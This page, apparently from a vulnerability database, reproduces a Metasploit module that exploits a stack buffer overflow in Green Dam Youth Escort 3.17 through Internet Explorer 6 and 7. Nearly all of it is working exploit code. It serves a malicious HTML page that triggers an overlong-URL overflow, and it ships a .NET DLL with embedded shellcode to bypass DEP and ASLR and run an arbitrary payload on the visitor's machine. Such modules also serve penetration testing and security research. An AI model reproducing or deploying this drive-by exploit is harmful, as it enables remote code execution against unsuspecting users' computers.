Green Dam URL Processing Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Green Dam URL Processing Buffer Overflow exploit for IE 6.0/7.0 on Windows XP/Vist

                                                ##
# $Id: greendam_url.rb 8762 2010-03-10 05:58:01Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# greendam_url.rb
#
# Green Dam URL Processing Buffer Overflow exploit for the Metasploit Framework
#
# Green Dam Youth Escort 3.17 successfully exploited on the following platforms:
#  - Internet Explorer 6, Windows XP SP2
#  - Internet Explorer 7, Windows XP SP3
#  - Internet Explorer 7, Windows Vista SP1
#
# .NET binary is used to bypass DEP and ASLR
#
# Trancer
# http://www.rec-sec.com
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Green Dam URL Processing Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack-based buffer overflow in Green Dam Youth Escort
				version 3.17 in the way it handles overly long URLs.
				By setting an overly long URL, an attacker can overrun a buffer and execute
				arbitrary code. This module uses the .NET DLL memory technique by Alexander
				Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.
			},
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Author&#39;         =&#62; [ &#39;Trancer &#60;mtrancer[at]gmail.com&#62;&#39; ],
			&#39;Version&#39;        =&#62; &#39;$Revision: 8762 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[&#39;OSVDB&#39;, &#39;55126&#39;],
					[&#39;URL&#39;, &#39;http://www.cse.umich.edu/~jhalderm/pub/gd/&#39;],		# Analysis of the Green Dam Censorware System
					[&#39;URL&#39;, &#39;http://www.milw0rm.com/exploits/8938&#39;],		# Original exploit by seer[N.N.U]
					[&#39;URL&#39;, &#39;http://taossa.com/archive/bh08sotirovdowd.pdf&#39;],	# .NET DLL memory technique
				],
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 1000,
					&#39;BadChars&#39; =&#62; &#34;\x00&#34;,
					&#39;Compat&#39;   =&#62;
						{
							&#39;ConnectionType&#39; =&#62; &#39;-find&#39;,
						},
					&#39;StackAdjustment&#39; =&#62; -3500,

					# Temporary stub virtualalloc() + memcpy() payload to RWX page
					&#39;PrependEncoder&#39; =&#62;
						&#34;\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c&#34;+
						&#34;\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32&#34;+
						&#34;\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07&#34;+
						&#34;\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24&#34;+
						&#34;\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8&#34;+
						&#34;\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64&#34;+
						&#34;\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x54&#34;+
						&#34;\xca\xaf\x91\xff\xd6\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08&#34;+
						&#34;\x56\x6a\x00\xff\xd0\x89\xc3\xeb\x0d\x5e\x89\xdf\xb9\xe8\x03\x00&#34;+
						&#34;\x00\xfc\xf3\xa4\xff\xe3\xe8\xee\xff\xff\xff&#34;
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[ &#39;Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0&#39;, { }],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Jun 11 2009&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))
	end

	def on_request_uri(cli, request)

		ibase = 0x24240000
		vaddr = ibase + 0x2065

		if (request.uri.match(/\.dll$/i))

			print_status(&#34;Sending DLL to #{cli.peerhost}:#{cli.peerport}...&#34;)

			return if ((p = regenerate_payload(cli)) == nil)

			# First entry points to the table of pointers
			vtable  = [ vaddr + 4 ].pack(&#34;V&#34;)
			cbase   = ibase + 0x2065 + (256 * 4)

			# Build a function table
			255.times { vtable &#60;&#60; [cbase].pack(&#34;V&#34;) }

			# Append the shellcode
			vtable &#60;&#60; p.encoded
			send_response(
				cli,
				Msf::Util::EXE.to_dotnetmem(ibase, vtable),
				{
					&#39;Content-Type&#39; =&#62; &#39;application/x-msdownload&#39;,
					&#39;Connection&#39;   =&#62; &#39;close&#39;,
					&#39;Pragma&#39;       =&#62; &#39;no-cache&#39;
				}
			)
			return
		end

		print_status(&#34;Sending HTML to #{cli.peerhost}:#{cli.peerport}...&#34;)

		j_function	= rand_text_alpha(rand(100)+1)
		j_url		= rand_text_alpha(rand(100)+1)
		j_counter	= rand_text_alpha(rand(30)+2)

		if (&#34;/&#34; == get_resource[-1,1])
			dll_uri = get_resource[0, get_resource.length - 1]
		else
			dll_uri = get_resource
		end
		dll_uri &#60;&#60; &#34;/generic-&#34; + Time.now.to_i.to_s + &#34;.dll&#34;

		html = %Q|&#60;html&#62;
&#60;head&#62;
&#60;script language=&#34;javascript&#34;&#62;
	function #{j_function}() {
		var #{j_url}=&#39;&#39;;
		for(var #{j_counter}=1;#{j_counter}&#60;=2035;#{j_counter}++)
			#{j_url}+=&#39;$&#39;;

		window.location=#{j_url}+&#39;.html&#39;;
	}
&#60;/script&#62;
&#60;/head&#62;
&#60;body onload=&#34;#{j_function}()&#34;&#62;
	&#60;object classid=&#34;#{dll_uri}#GenericControl&#34;&#62;
	&#60;object&#62;
&#60;/body&#62;
&#60;/html&#62;
		|

		# Transmit the compressed response to the client
		send_response(cli, html, { &#39;Content-Type&#39; =&#62; &#39;text/html&#39; })

		# Handle the payload
		handler(cli)
	end
end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1